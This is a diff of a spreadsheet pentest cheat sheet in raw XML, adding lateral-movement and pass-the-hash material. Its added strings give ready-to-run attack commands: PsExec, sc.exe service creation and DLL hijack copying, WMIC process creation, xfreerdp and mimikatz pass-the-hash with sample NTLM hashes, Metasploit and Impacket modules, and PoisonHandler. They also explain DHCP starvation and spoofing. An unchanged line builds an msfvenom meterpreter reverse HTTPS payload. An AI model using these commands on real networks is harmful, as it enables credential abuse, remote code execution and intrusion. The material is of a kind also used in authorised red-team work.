     </row>
     <row r="289" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B289" s="24" t="s">
-        <v>522</v>
-      </c>
-      <c r="C289" s="27"/>
-      <c r="D289" s="28" t="s">
-        <v>515</v>
+        <v>536</v>
+      </c>
+      <c r="C289" s="24"/>
+      <c r="D289" s="27" t="s">
+        <v>537</v>
       </c>
     </row>
     <row r="290" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B290" s="24" t="s">
-        <v>520</v>
-      </c>
-      <c r="C290" s="27"/>
-      <c r="D290" s="28" t="s">
-        <v>516</v>
+        <v>538</v>
+      </c>
+      <c r="C290" s="24"/>
+      <c r="D290" s="27" t="s">
+        <v>539</v>
       </c>
     </row>
     <row r="291" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B291" s="24" t="s">
+      <c r="D291" s="19"/>
+    </row>
+    <row r="292" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D292" s="19"/>
+    </row>
+    <row r="293" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B293" s="53" t="s">
+        <v>509</v>
+      </c>
+      <c r="C293" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D293" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="294" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B294" s="24" t="s">
         <v>523</v>
       </c>
-      <c r="C291" s="27"/>
-      <c r="D291" s="28" t="s">
-        <v>519</v>
-      </c>
-    </row>
-    <row r="292" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B292" s="24" t="s">
-        <v>518</v>
-      </c>
-      <c r="C292" s="27"/>
-      <c r="D292" s="28" t="s">
-        <v>517</v>
-      </c>
-    </row>
-    <row r="293" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D293" s="19"/>
-    </row>
-    <row r="294" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B294" s="54" t="s">
-        <v>501</v>
-      </c>
-      <c r="C294" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D294" s="35" t="s">
-        <v>1</v>
+      <c r="C294" s="49" t="s">
+        <v>511</v>
+      </c>
+      <c r="D294" s="46" t="s">
+        <v>510</v>
       </c>
     </row>
     <row r="295" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B295" s="24" t="s">
-        <v>525</v>
-      </c>
-      <c r="C295" s="50" t="s">
-        <v>503</v>
-      </c>
-      <c r="D295" s="47"/>
+        <v>520</v>
+      </c>
+      <c r="C295" s="26" t="s">
+        <v>512</v>
+      </c>
+      <c r="D295" s="27" t="s">
+        <v>513</v>
+      </c>
     </row>
     <row r="296" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B296" s="24" t="s">
-        <v>506</v>
-      </c>
-      <c r="C296" s="24"/>
-      <c r="D296" s="28" t="s">
-        <v>504</v>
+        <v>521</v>
+      </c>
+      <c r="C296" s="26"/>
+      <c r="D296" s="27" t="s">
+        <v>514</v>
       </c>
     </row>
     <row r="297" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B297" s="24" t="s">
-        <v>505</v>
-      </c>
-      <c r="C297" s="24"/>
-      <c r="D297" s="28" t="s">
-        <v>507</v>
+        <v>519</v>
+      </c>
+      <c r="C297" s="26"/>
+      <c r="D297" s="27" t="s">
+        <v>515</v>
       </c>
     </row>
     <row r="298" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B298" s="24" t="s">
-        <v>509</v>
-      </c>
-      <c r="C298" s="24"/>
-      <c r="D298" s="28" t="s">
+        <v>522</v>
+      </c>
+      <c r="C298" s="26"/>
+      <c r="D298" s="27" t="s">
+        <v>518</v>
+      </c>
+    </row>
+    <row r="299" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B299" s="24" t="s">
+        <v>517</v>
+      </c>
+      <c r="C299" s="26"/>
+      <c r="D299" s="27" t="s">
+        <v>516</v>
+      </c>
+    </row>
+    <row r="300" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D300" s="19"/>
+    </row>
+    <row r="301" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B301" s="53" t="s">
+        <v>500</v>
+      </c>
+      <c r="C301" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D301" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="302" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B302" s="24" t="s">
+        <v>524</v>
+      </c>
+      <c r="C302" s="49" t="s">
+        <v>502</v>
+      </c>
+      <c r="D302" s="46"/>
+    </row>
+    <row r="303" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B303" s="24" t="s">
+        <v>505</v>
+      </c>
+      <c r="C303" s="24"/>
+      <c r="D303" s="27" t="s">
+        <v>503</v>
+      </c>
+    </row>
+    <row r="304" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B304" s="24" t="s">
+        <v>504</v>
+      </c>
+      <c r="C304" s="24"/>
+      <c r="D304" s="27" t="s">
+        <v>506</v>
+      </c>
+    </row>
+    <row r="305" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B305" s="24" t="s">
         <v>508</v>
       </c>
-    </row>
-    <row r="299" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B299" s="54" t="s">
-        <v>526</v>
-      </c>
-      <c r="C299" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D299" s="35" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="300" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B300" s="24" t="s">
-        <v>529</v>
-      </c>
-      <c r="C300" s="27" t="s">
-        <v>527</v>
-      </c>
-      <c r="D300" s="28" t="s">
-        <v>528</v>
-      </c>
-    </row>
-    <row r="301" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B301" s="21"/>
-      <c r="C301" s="70"/>
-      <c r="D301" s="34"/>
-    </row>
-    <row r="302" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B302" s="21"/>
-      <c r="C302" s="70"/>
-      <c r="D302" s="34"/>
-    </row>
-    <row r="303" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B303" s="54" t="s">
-        <v>331</v>
-      </c>
-      <c r="C303" s="10" t="s">
-        <v>117</v>
-      </c>
-      <c r="D303" s="35" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="304" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B304" s="41" t="s">
-        <v>332</v>
-      </c>
-      <c r="C304" s="45" t="s">
-        <v>498</v>
-      </c>
-      <c r="D304" s="28" t="s">
-        <v>425</v>
-      </c>
-    </row>
-    <row r="305" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B305" s="41" t="s">
-        <v>333</v>
-      </c>
       <c r="C305" s="24"/>
-      <c r="D305" s="18" t="s">
-        <v>620</v>
+      <c r="D305" s="27" t="s">
+        <v>507</v>
       </c>
     </row>
     <row r="306" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B306" s="54" t="s">
-        <v>486</v>
+      <c r="B306" s="53" t="s">
+        <v>525</v>
       </c>
       <c r="C306" s="10" t="s">
         <v>117</v>
       </c>
-      <c r="D306" s="35" t="s">
+      <c r="D306" s="34" t="s">
         <v>1</v>
       </c>
     </row>
     <row r="307" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B307" s="41" t="s">
+      <c r="B307" s="24" t="s">
+        <v>528</v>
+      </c>
+      <c r="C307" s="26" t="s">
+        <v>526</v>
+      </c>
+      <c r="D307" s="27" t="s">
+        <v>527</v>
+      </c>
+    </row>
+    <row r="308" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B308" s="21"/>
+      <c r="C308" s="68"/>
+      <c r="D308" s="33"/>
+    </row>
+    <row r="309" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B309" s="21"/>
+      <c r="C309" s="68"/>
+      <c r="D309" s="33"/>
+    </row>
+    <row r="310" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B310" s="53" t="s">
+        <v>330</v>
+      </c>
+      <c r="C310" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D310" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="311" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B311" s="40" t="s">
+        <v>331</v>
+      </c>
+      <c r="C311" s="44" t="s">
+        <v>497</v>
+      </c>
+      <c r="D311" s="27" t="s">
+        <v>424</v>
+      </c>
+    </row>
+    <row r="312" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B312" s="40" t="s">
+        <v>332</v>
+      </c>
+      <c r="C312" s="24"/>
+      <c r="D312" s="18" t="s">
+        <v>619</v>
+      </c>
+    </row>
+    <row r="313" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B313" s="53" t="s">
+        <v>485</v>
+      </c>
+      <c r="C313" s="10" t="s">
+        <v>117</v>
+      </c>
+      <c r="D313" s="34" t="s">
+        <v>1</v>
+      </c>
+    </row>
+    <row r="314" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B314" s="40" t="s">
+        <v>491</v>
+      </c>
+      <c r="C314" s="44" t="s">
         <v>492</v>
       </c>
-      <c r="C307" s="45" t="s">
+      <c r="D314" s="59" t="s">
+        <v>498</v>
+      </c>
+    </row>
+    <row r="315" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B315" s="40" t="s">
+        <v>490</v>
+      </c>
+      <c r="C315" s="44" t="s">
+        <v>495</v>
+      </c>
+      <c r="D315" s="59" t="s">
+        <v>496</v>
+      </c>
+    </row>
+    <row r="316" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B316" s="40" t="s">
+        <v>486</v>
+      </c>
+      <c r="C316" s="44" t="s">
+        <v>487</v>
+      </c>
+      <c r="D316" s="59" t="s">
         <v>493</v>
       </c>
-      <c r="D307" s="60" t="s">
-        <v>499</v>
-      </c>
-    </row>
-    <row r="308" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B308" s="41" t="s">
-        <v>491</v>
-      </c>
-      <c r="C308" s="45" t="s">
-        <v>496</v>
-      </c>
-      <c r="D308" s="60" t="s">
-        <v>497</v>
-      </c>
-    </row>
-    <row r="309" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B309" s="41" t="s">
-        <v>487</v>
-      </c>
-      <c r="C309" s="45" t="s">
+    </row>
+    <row r="317" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B317" s="40" t="s">
         <v>488</v>
       </c>
-      <c r="D309" s="60" t="s">
+      <c r="C317" s="44" t="s">
+        <v>489</v>
+      </c>
+      <c r="D317" s="60" t="s">
         <v>494</v>
       </c>
-    </row>
-    <row r="310" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B310" s="41" t="s">
-        <v>489</v>
-      </c>
-      <c r="C310" s="45" t="s">
-        <v>490</v>
-      </c>
-      <c r="D310" s="61" t="s">
-        <v>495</v>
-      </c>
-    </row>
-    <row r="311" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D311" s="19"/>
-    </row>
-    <row r="312" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D312" s="19"/>
-    </row>
-    <row r="315" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D315" s="19"/>
-    </row>
-    <row r="316" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D316" s="19"/>
-    </row>
-    <row r="317" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="D317" s="19"/>
     </row>
     <row r="318" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="D318" s="19"/>
     </row>
     <row r="319" spans="2:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="D319" s="19"/>
+    </row>
+    <row r="322" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D322" s="19"/>
+    </row>
+    <row r="323" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D323" s="19"/>
+    </row>
+    <row r="324" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D324" s="19"/>
+    </row>
+    <row r="325" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D325" s="19"/>
+    </row>
+    <row r="326" spans="4:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="D326" s="19"/>
     </row>
   </sheetData>
   <mergeCells count="3">
     <mergeCell ref="A1:D2"/>
-    <mergeCell ref="A189:D190"/>
-    <mergeCell ref="A266:D267"/>
+    <mergeCell ref="A192:D193"/>
+    <mergeCell ref="A273:D274"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="D277" display="# Installation:_x000a_   https://github.com/darkoperator/Posh-SecMod_x000a_   _x000a_# PS C:\&gt; Get-Command –Module Posh-SecMod_x000a__x000a_# Posh-SecMod – Invoke-ARPScan _x000a_   PS C:\&gt; Invoke-ARPScan –CIDR 192.168.13.1/24_x000a__x000a_# Posh-SecMod – Invoke-ReverseDNSLookup_x000a_   PS C:\&gt; Invoke-Revers"/>
+    <hyperlink ref="D284" display="# Installation:_x000a_   https://github.com/darkoperator/Posh-SecMod_x000a_   _x000a_# PS C:\&gt; Get-Command –Module Posh-SecMod_x000a__x000a_# Posh-SecMod – Invoke-ARPScan _x000a_   PS C:\&gt; Invoke-ARPScan –CIDR 192.168.13.1/24_x000a__x000a_# Posh-SecMod – Invoke-ReverseDNSLookup_x000a_   PS C:\&gt; Invoke-Revers"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.51180555555555496" footer="0.51180555555555496"/>
   <pageSetup paperSize="9" firstPageNumber="0" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/>

--- a/Pentest-CheatSheet.xlsx
+++ b/Pentest-CheatSheet.xlsx
@@ -19,7 +19,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="715" uniqueCount="641">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="775" uniqueCount="702">
   <si>
     <t>Passive Information Gathering</t>
   </si>
@@ -681,11 +681,6 @@
     <t>ARP replay-Bypassing SKA</t>
   </si>
   <si>
-    <t># DHCP spoofing: 
-    the attacker should be like a rogue DHCP, and send a DHCPOFFER with a greater lease time then any servet on the network (long then the real DHCP server)
-    The attack help the attacker to recongnize the IP address of victime</t>
-  </si>
-  <si>
     <t># creat malicious test.dekstop file</t>
   </si>
   <si>
@@ -1072,22 +1067,6 @@
 - we intercept the request , forward the real DNS request and respond to the victime with a fake domain and  IP address
 - the victime web browser will now search if the domain should be accessed securly (https) this can be done by checking the HSTS preloaded list or by 
 - Since the domain is different the browser will continue the communication via HTTP</t>
-  </si>
-  <si>
-    <t xml:space="preserve"># MITM in public key: attacker should be between "Alice, Bob and Key publisher"
-How the attack work:
-In order for the attack work, the attacker (M) should be able to recognize the queries to the key server and take following steps to mount a successful MITM attack:
-- let we suppose that Alice query the "Key distribution server" to get BoB public key
-- The attacker intercept Alice's query and forward it to the "Keys Server"
-- The "key Server" send back Bob's public key
-- Then attacker intercept Bob's public key and store it
-- Then attacker send to Alice hiw own Public key instead of Bob's public key
-- Alice would encrypt data using the attacker Publc Key thinking that she is using Bob's public key
-- The attacker will decrypt Alice encrypted messages with his private key
-- The attacker then forwarded the message to Bob using Bob's public key
-          -----1-Query:Bob's key----&gt;                 ----2-Query:Bob's key----&gt;
-Alice                                                      Attacker                                                    Key distribution server
-          &lt;----4-Attacker key--------                   &lt;----3-Bob's key------------  </t>
   </si>
   <si>
     <t xml:space="preserve"># LLMNR and NBTNS spoofing are alos two effective methode for capturing users' NTLMv1, NTLMv2 or LM hashes using the MITM attack
@@ -1470,9 +1449,6 @@
   </si>
   <si>
     <t>Zone transfers are usually misconfigurations of a DNS server. They should be enabled, if required, only for trusted IP addresses (usually trusted downstream name servers). When zone transfers are open to anyone, we can enumerate the whole DNS record for that zone.</t>
-  </si>
-  <si>
-    <t>Dealing with DHCP</t>
   </si>
   <si>
     <t xml:space="preserve"># in this methode we will create a fake server and we will force the client to connect to through fake SMB authentication, in a way to  crack the challenge/response
@@ -1730,10 +1706,6 @@
   </si>
   <si>
     <t>Enumeration (Interesting Corners Of Active Directory)</t>
-  </si>
-  <si>
-    <t>an attacker can respond maliciously to DHCP requests to assign wrong addresses. This can cause network malfunctions, but more importantly assign bad response attributes. 
-Indeed, this allows the attacker to force his victims to consider the attacker as his default route or his DNS server</t>
   </si>
   <si>
     <t>Active Directory ACLs</t>
@@ -5941,9 +5913,6 @@
     <t>Encoding Technique</t>
   </si>
   <si>
-    <t>Red Team (PowerShell)</t>
-  </si>
-  <si>
     <t>Msfvenom –p windows/x64/meterpreter_reverse_https lport=444 lhsot=192.168.13.62 psh-reflection &gt; payload.ps1</t>
   </si>
   <si>
@@ -8516,29 +8485,612 @@
     <t>kerberos ticket when NTLM disabled</t>
   </si>
   <si>
-    <t>Pass-the-hash [PtH Over SMB]</t>
-  </si>
-  <si>
-    <t>Pass-the-hash [PtH over PsExec]</t>
-  </si>
-  <si>
-    <t>Pass-the-hash [PtH Over WMI]</t>
-  </si>
-  <si>
-    <t>Pass-the-hash [PtH Over RPCB]</t>
-  </si>
-  <si>
     <t>Coming soon :)</t>
   </si>
   <si>
-    <t>coming soon :)</t>
+    <t>PsExec</t>
+  </si>
+  <si>
+    <t>Schtasks.exe</t>
+  </si>
+  <si>
+    <t>AT</t>
+  </si>
+  <si>
+    <t>WMI</t>
+  </si>
+  <si>
+    <t>PoisonHandler</t>
+  </si>
+  <si>
+    <t>Pass the hash with RDP [FreeRDP]</t>
+  </si>
+  <si>
+    <t>Pass the hash with native RDP [mimikatz]</t>
+  </si>
+  <si>
+    <t>Relie on non-scriptable control of the COM library [SharpRDP]</t>
+  </si>
+  <si>
+    <t>Hijacking RDP session from other users</t>
+  </si>
+  <si>
+    <t>Browser Pivoting [CursedChrome]</t>
+  </si>
+  <si>
+    <t>ChangeServiceConfigA [SCShell]</t>
+  </si>
+  <si>
+    <t>WinRM</t>
+  </si>
+  <si>
+    <t>DCOM</t>
+  </si>
+  <si>
+    <t>Named Pipes</t>
+  </si>
+  <si>
+    <t>PowerShell Web Access</t>
+  </si>
+  <si>
+    <t>Net-NTLM Relaying</t>
+  </si>
+  <si>
+    <t>Computer Accounts</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># psexec.py username:'password'@ipaddress
+# python3 psexec.py Administrator:@spookysec.local -hashes &lt;Complete Hash&gt;
+# Psexec.exe
+   psexec.exe -u DOMAIN\USER -p PASSWORD \\REMOTE "COMMAND"
+# Psexec.py
+    python psexec.py DOMAIN/USER:PASSWORD@REMOTE [CMD\
+</t>
+  </si>
+  <si>
+    <t># PsExec
+is a microsoft tool that can be used to execute a program on another computer
+# PsExec can be executed using:
+- PsExec from the windows Sysinternal tools
+- Psexec.py from SecureAuth's Impacket (Hashes or Kerberos Tickets can be used) 
+- SharpExec -PSExec : Gives the operator the ability to upload files or execute remote commands as NT AUTHORITY\SYSTEM</t>
+  </si>
+  <si>
+    <t>SC [smbexec.py | SharpExec -SMBEec]</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># sc Example
+sc.exe \\REMOTE  creat SERVICE_NAME displayname=NAME binpath="COMMAND"
+start=demand
+sc.exe \\REMOTE start SERVICE_NAME
+sc.exe \\REMOTE delete SERVICE_NAME
+# Instead of creating new service, we can place in the remote machine specifically crafted DLLs files to trusted directories and restarting services remotly
+   - This files can achieved by monitoring LoadLibrary calls on librariesmissing in specif path. 2 Examples are:
+        wblsctrl_poc: DLL hijacking against the IKEEXT service  (https://github.com/djhohnstein/wlbsctrl_poc)
+        TSMSISrv_poc: DLL hijacking against SessionEnv Service  (https://github.com/djhohnstein/TSMSISrv_poc)
+# sc.exe \\COMPUTER stop SessionEnv
+   COPY TSMISrv.dll to C:\Windows\System32\TSMISrv.dll
+   sc.exe \\COMPUTER start SessioEnv
+      </t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Service Control can creat, stop query or delete windows services in a local or remote computer via SMB
+   Be aware that the exectuavble must be specifically a service binary as it must be validated by the serice control manager SCM, otherwise it will exit execution
+# Impacket's smbexec.py or SharpExec -SMBExec can automate this process executing commands via sc and retriving the command output via SMB:
+</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Schatsks.exe allow us to creat ,delete query or change and run and end scheduled tasks on a local or remtoe comuter 
+</t>
+  </si>
+  <si>
+    <t># AT can be used to schedule command to run at a specif time. 
+# Its linux equivalent could be cron-jobs with the difference that at can be used on remote hosts.
+# Also has been disabled on windows &gt;8.1 it can be re-enabled setting a registry key</t>
+  </si>
+  <si>
+    <t># Wmic.exe can be used to access remote window components using Remote Procedure Calls (RPC 135/TCP) for remote and an ephermal port later
+# starting a service or executing commands remotly are some tasks that can be performed via wmic.exe 
+# Other options are:
+   - wmicexec.py from impacket has the additional options to authenticate via NTLM hashes or kerberos 
+   - SharpExec - WmicExec: Runs as the user and can be used also as a semi-interactive shell</t>
+  </si>
+  <si>
+    <t># WMIC example
+    wmic /node:REMOTE /user:DOMAIN\USER /password:PASSWORD process call create "C:Windows\System32\notpad.exe"
+# WMIC Passing the Ticket
+   wmic /authority:"kerberos:DOMAIN\REMOTE" /node:REMOTE process call create "c:\Windows\System32\nodepad.exe"</t>
+  </si>
+  <si>
+    <t># poisonHandler can also be used to perform lateral movement by registering a protocl handler remotely and invoking it simply using "start handler://" to execute arbitraty commands evading detection</t>
+  </si>
+  <si>
+    <t># Execute with the current user
+   Execute-PoisonHandler -ComputerName &lt;TARGET&gt; -Payload "&lt;PAYLOAD&gt;"
+# Execute with a custom handler name
+    Execute-PoisonHandler  -ComputerName &lt;TARGET&gt; -Payload "&lt;PAYLOAD&gt;" -Handler ms-handler-name
+# Execute as other user 
+    Execute-PoisonHandler  -ComputerName &lt;TARGET&gt; -Payload "&lt;PAYLOAD&gt;" -Username &lt;USER&gt; -Password &lt;PASSWORD&gt;
+#Use rundll32 url.dll,FileProtocolHandler
+   Execute-PoisonHandler  -ComputerName &lt;TARGET&gt; -Payload "&lt;PAYLOAD&gt;" -Username &lt;USER&gt; -Password &lt;PASSWORD&gt; -UseRunDLL32 True
+# Specify the remote command used. the handler name will be appended at the end automaticallu
+   Execute-PoisonHandler  -ComputerName &lt;TARGET&gt; -Payload "&lt;PAYLOAD&gt;" -Username &lt;USER&gt; -Password &lt;PASSWORD&gt; -RemoteCommand "&lt;PAYLOAD&gt;"</t>
+  </si>
+  <si>
+    <t># we can use PTH with RDP If the server allows Restricted Admin Login (A feature that prevent storing RDP user's credentials in memory)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># We can achieve that :
+xfreerdp /u:&lt;USERNAME&gt; /v:&lt;TARGET_IP&gt;
+xfreerdp /u:&lt;USERNAME&gt; /p:&lt;PASSWORD&gt; /cert:ignore  /v:&lt;TARGET_IP&gt;
+xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:MACHINE_IP /u:Administrator /p:'TryH4ckM3!'
+xfreerdp /u:'corp\fela' /v:46.137.142.191
+xfreerdp /u:admin /d:foocorp /pth:123hghasd0897123jkhasd /v:172.12.12.2
+</t>
+  </si>
+  <si>
+    <t># an attacker can respond maliciously to DHCP requests to assign wrong addresses. 
+This can cause network malfunctions, but more importantly assign bad response attributes. 
+Indeed, this allows the attacker to force his victims to consider the attacker as his default route or his DNS server</t>
+  </si>
+  <si>
+    <t># DHCP Starvation attacks
+- In a DHCP starvation attack, an attacker broadcasts large number of DHCP REQUEST messages with spoofed source MAC addresses. 
+- If the legitimate DHCP Server in the network start responding to all these bogus DHCP REQUEST messages, available IP Addresses in the DHCP server scope will be depleted within a very short span of time. 
+- Once the available number of IP Addresses in the DHCP server is depleted, network attackers can then set up a rogue DHCP server and respond to new DHCP requests from network DHCP clients. 
+- By setting up a rogue DHCP server, the attacker can now launch DHCP spoofing attack.
+# DHCP spoofing attacks
+- After a DHCP starvation attack and setting up a rogue DHCP server, the attacker can start distributing IP addresses and other TCP/IP configuration settings to the network DHCP clients. 
+- TCP/IP configuration settings include Default Gateway and DNS Server IP addresses. 
+- Network attackers can now replace the original legitimate Default Gateway IP Address and DNS Server IP Address with their own IP Address.
+- Once the Default Gateway IP Address of the network devices are is changed, the network clients start sending the traffic destined to outside networks to the attacker's computer. 
+- The attacker can now capture sensitive user data and launch a man-in-the-middle attack. 
+- This is called as DHCP spoofing attack. Attacker can also set up a rogue DNS server and deviate the end user traffic to fake web sites and launch phishing attacks.
+# attack in steps
+   https://kalilinuxtutorials.com/yersinia/
+# DHCP spoofing [without starvation]: 
+    the attacker should be like a rogue DHCP, and send a DHCPOFFER with a greater lease time then any server on the network (long then the real DHCP server)
+    The attack help the attacker to recongnize the IP address of victime</t>
+  </si>
+  <si>
+    <t># Metasploit: smb_login
+  use auxiliary/scanner/smb/smb_login
+  setrhosts 192.168.1.105
+  set user_file user.txt
+  set pass_file pass.txt
+  set smbdomain ignite
+  exploit
+# Empire: Invoke_smbexec
+  usemodule lateral_movement/invoke_smbexec
+  set ComputerName WIN-S0V7KMTV.LD2.ignite.local
+  setUsername Administrator
+  set Hash 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
+  set Listener http
+  execute
+  As we discussed earlier that Windows now don’t use the LM hash, so we will use the sequence of 32 zeros in place of the LM hash.
+# Impacket: smbclient.py
+  python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator 192.168.1.105
+# PTH-smbclient
+  pth-smbclient Uignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
+# Crackmapexec
+  crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig</t>
+  </si>
+  <si>
+    <t>PTH over SMB [smb_login | Invoke_smbexec | smbclient.py | PTH-smbclient | Crackmapexec]</t>
+  </si>
+  <si>
+    <t>privilege::debug
+sekurlsa::pth /user:Administrator /domain:ignite. Local /ntlm:32196B56F FE6F45E294117B91A83BF38</t>
+  </si>
+  <si>
+    <t>PTH over PsExec [smb_psexec | psexec_command | psexec.py</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Metasploit: psexec
+use exploit/windows/smb_psexec
+set rhosts 192.168.1.105
+set smbuser administrator
+set smbdomain ignite
+set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
+exploit
+# Metasploit: psexec_command
+use admin/smb/psexec_command
+set rhosts 192.168.1.105
+set smbdomain ignite
+set smbuser administrator
+set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
+set command netuser
+run
+# Impacket: psexec.py
+python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.105
+</t>
+  </si>
+  <si>
+    <t>PTH overs WMI [wmiexec.py |Invoke-WMIExec | PTH-wmic | Wmiexec.exe]</t>
+  </si>
+  <si>
+    <t># Impacket: wmiexec.py
+python wmiexec py -hashes 00000000000000000000000000000000:32196 B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.105
+# PowerShell: Invoke-WMIExec
+- Download Invoke-WMIExec on the target
+Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\hacked" -Verbose
+# PTH-wmic
+pth-wmic -U ignite/Administrator%000000000000000000000000000000003:2196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
+# Wmiexec.exe
+- Download Wmiexec.exe on the target
+wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105</t>
+  </si>
+  <si>
+    <t>PTH [mimikatz]</t>
+  </si>
+  <si>
+    <t># Impacket: rpcdump.py
+pthon rpcdump.py 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.105
+# PTH-rpcclient
+pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
+# PTH-net
+pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105</t>
+  </si>
+  <si>
